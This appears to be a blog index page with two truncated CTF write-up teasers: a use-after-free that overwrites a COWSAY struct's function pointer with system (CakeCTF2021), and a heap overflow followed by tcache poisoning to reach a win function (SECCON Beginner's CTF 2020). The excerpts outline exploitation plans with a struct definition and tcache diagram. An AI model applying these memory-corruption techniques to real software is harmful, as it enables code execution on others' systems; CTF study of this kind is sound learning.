uaf4b - CakeCTF2021

Plan Overwrite the function pointer with system function by Use After Free. About CAWSAY struct In freed chunk, fn_dialogue is assigned to fd and message is assigned to bk. typedef struct { void (*fn_dialogue)(char*); char *message; } COWSAY; Also, you pay attention to execute cowsay->fn_dialogue(cowsay->message); in L167~171 in main.c. case 1: /* Use cowsay */ printf("[+] You're trying to call 0x%016lx\n", (addr)cow say->fn_dialogue); cowsay->fn_dialogue(cowsay->message); break; malloced chunk When it malloced, Heap area is following....

2022-05-10 · 1 min · Me

Beginner's Heap - SECCON Beginner's CTF 2020

Plan Overwrite under chunk’s fd pointer by Heap Overflow, and then call win function by tcache poisoning. Preparation Malloced and then, it connects area freed of B to tcache. -=-=-=-=-= TCACHE -=-=-=-=-= [ tcache (for 0x20) ] || \/ [ 0x000055dfd3002350(rw-) ] || \/ [ END OF TCACHE ] -=-=-=-=-=-=-=-=-=-=-=-=-=-= Vulnerability Vulnerability is Heap Overflow. You can write 0x80 byte to a chunk for 0x18. Overwrite B’s fd pointer Now, there isn’t a freed chunk which connects to the next because the freed chunk’s fd is NULL....

2022-05-06 · 2 min · Me